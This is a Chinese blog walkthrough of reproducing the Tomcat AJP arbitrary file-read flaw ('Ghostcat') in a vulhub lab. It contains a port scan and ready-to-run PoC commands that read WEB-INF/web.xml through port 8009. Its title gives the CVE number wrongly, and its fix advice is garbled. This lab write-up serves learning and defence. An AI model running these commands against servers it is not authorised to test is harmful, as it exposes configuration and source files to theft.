关于CVE-2020-1983:Tomcat 文件包含漏洞的问题
目录
- 一、靶场环境
- 1、漏洞:任意文件包含
- 2、影响版本
- 二、搭建环境
- 1、启动环境
- 2、访问
- 3、漏洞利用
- 4、修复建议
起序:漏扫完看报告的时候发现的,复现学习一下。
一、靶场环境
使用的是 github 上的 vulhub 环境。Tomcat 版本为 9.0.30。

1、漏洞:任意文件包含
攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。
2、影响版本
- Apache Tomcat 9.x < 9.0.31
- Apache Tomcat 8.x < 8.5.51
- Apache Tomcat 7.x < 7.0.100
- Apache Tomcat 6.x
二、搭建环境
1、启动环境
自行安装 vulhub。
# Run environment 运行环境 docker-compose up -d

2、访问
http://192.168.2.129:8080/

3、漏洞利用
端口扫描,使用 fscan 扫描一下这个 ip 开启的端口。可以看出这个 ip 对应的服务器开启了 8080 和 8009 端口。
fscan -h 192.168.2.129

下载下面的 POC 脚本(脚本内容应该是一样的)。我刚开始一直使用 python3,一直报错,然后抱着试试看的态度使用 python2,MD,成功了,真坑啊,主要是我太菜了。(咱就是妥妥的脚本小子)
https://github.com/xindongzhuaizhuai/CVE-2020-1938
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
# CVE-2020-1938 python2 CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml 192.168.2.129 # CNVD-2020-10487-Tomcat-Ajp-lfi python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.2.129 -p 8009 -f WEB-INF/web.xml

4、修复建议
临时禁用 AJP 协议端口,在 conf/server.xml 配置文件中注释掉:配置 AJP 配置中的 secretRequired 跟 secret 属性来限制认证下载更新版本。
栏 目:其它服务器
下一篇:解决Vmware虚拟机安装centos8报错“Section %Packages Does Not End With %End. Pane Is Dead”
本文标题:关于CVE-2020-1983:Tomcat 文件包含漏洞的问题
本文地址:https://zz.feitang.co/server/32890.html
您可能感兴趣的文章
- 02-02hadoop动态增加和删除节点方法介绍
- 02-02干货 | Linux新手入门好书推荐
- 02-02linux系统下MongoDB单节点安装教程
- 02-02Linux下nginx生成日志自动切割的实现方法
- 02-02Centos 6中编译配置httpd2.4的多种方法详解
- 02-02CentOS7 下安装telnet服务的实现方法
- 02-02分布式Hibernate search详解
- 02-02Hadoop对文本文件的快速全局排序实现方法及分析
- 02-02CentOS6.3添加nginx系统服务的实例详解
- 02-02Hadoop编程基于MR程序实现倒排索引示例


阅读排行
推荐教程
- 12-07一文教你怎么选择Tomcat对应的JDK版本
- 12-07解决tomcat启动报错:一个或多个listeners启动失败问题
- 12-07Tomcat启动报错:严重: Unable to process Jar entry [m
- 12-07Tomcat配置IPV6的实现步骤
- 12-07tomcat启动报错jar not loaded的问题
- 12-11docker存储目录迁移示例教程
- 01-07windows server 2008安装配置DNS服务器
- 12-07Tomcat部署war包并成功访问网页详细图文教程
- 12-15Docker-Compose搭建Spark集群的实现方法
- 12-19Zabbix SAML SSO 登录绕过漏洞的操作流程




